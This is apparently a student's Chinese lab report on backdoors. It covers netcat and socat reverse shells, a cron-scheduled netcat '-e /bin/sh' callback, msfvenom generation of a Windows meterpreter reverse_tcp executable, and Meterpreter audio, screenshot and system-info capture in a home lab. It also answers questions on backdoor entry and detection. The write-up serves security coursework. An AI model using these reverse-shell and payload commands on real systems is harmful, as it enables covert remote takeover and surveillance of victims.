Exp2 后门原理与实践 20154325 杨云鹏

 

 

一.实验内容

 
(1)使用netcat获取主机操作Shell,cron启动
 
(2)使用socat获取主机操作Shell, 任务计划启动
 
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
 
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

二.实验步骤

    1.Win获得Linux Shell

Windows和Linux查看IP地址


Windows的IP地址为192.168.43.131

Linux的IP地址为192.168.126.128

Windows监听4325端口

Linux链接4325端口

 

然后就可以在Windows上利用指令查看Linux上的信息了

    2.Linux获得Windows的shell

    类似的,首先用Linux监听4325端口

然后在Windows上链接4325端口,这里需要关闭Windows防火墙以及杀毒软件,否则无法连接

在Linux上就可以使用指令查看Windows上的信息了,尝试在Kali上输入一些错误指令,在Windows的命令行提示符里就会报错

3.使用netcat传输数据

 Windows监听4325端口

Linux链接4325端口

Windows与Linux之间就能直接发送消息了

4.cron启动

Windows监听4325端口

在Linux使用crontab -e指令设置定时指令,选择第三个编辑器

然后按i添加指令 10 * * * * /bin/netcat 192.168.126.128 4325 -e /bin/sh ,:x退出,在每小时的第10分钟执行指令

时间到后就能在Windows上查看Linux的信息了

5.socat获取主机操作Shell, 任务计划启动

在Windows系统的计划任务里新建一个任务

设置完成之后运行即可

在Linux输入指令socat - tcp:192.168.43.131:4325

 

可以看到已经成功的获得了一个cmd shell

6.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Linux里使用指令生成后门程序:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.131 LPORT=4325 -f exe > 20154325_backdoor.exe

 

可以通过ls指令看到这个后门程序

然后把这个程序拷到Windows上

在Linux上使用指令

msfconsole指令进入msf控制台,使用监听模块,并设置payload以及反弹回连的IP和端口

 

设置完成后输入指令exploit 开始监听

接着在Windows打开后门程序

 

7.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

在上一步的基础上继续实验,首先是录音

然后是摄像头,这里由于我的摄像头损坏指令运行失败了

查看系统信息

截屏

三.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

通过伪基站发射WiFi信号,然后将我本来要访问的网站改成准备好的木马网站,植入木马进入系统。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

伪装成正常软件,下载启动后植入后门,挂载在网站上,点击网站时自动下载到电脑上,然后定时自动启动。

(3)Meterpreter有哪些给你映像深刻的功能?

如果被植入后门,并在不知觉的情况下启动了,那么通过Meterpreter,完全可以神不知鬼不觉的窃取到大量信息。

(4)如何发现自己有系统有没有被安装后门?

 通过端口监控,防止端口被后门程序占用,还有进程监控,查看后台进程是否在非法占用系统资源。

四.心得体会

     通过这次试验,我发现植入木马后门比我想象中要简单多,之前在网络安全课程中,我们也进行过木马植入的实验,通过在网站上挂载隐形木马来进行植入,但感觉比较容易防范,这次仅仅是通过IP地址就能进行植入,如果利用伪基站将网站强制导向这个IP地址,然后再转回去,这样感觉很难防范,也更难发觉。这次实验也提醒了我黑客如果想要入侵我的电脑比我想象中要简单得多,平时要注意不要浏览危险网站,也不能随意下载东西,作为一个电科院人更要时刻注意。

原文地址:https://www.cnblogs.com/Quin/p/8672010.html